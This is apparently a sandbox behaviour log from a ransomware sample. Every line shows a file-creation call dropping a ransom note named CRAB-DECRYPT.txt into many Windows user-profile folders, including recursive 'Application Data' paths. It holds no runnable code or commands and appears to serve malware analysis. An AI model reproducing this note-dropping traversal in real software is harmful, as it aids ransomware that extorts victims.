Create C:\Documents and Settings\Default\Start Menu\Programs\System Tools\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\Start Menu\Programs\Windows PowerShell\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\Templates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Default\Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Roaming\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
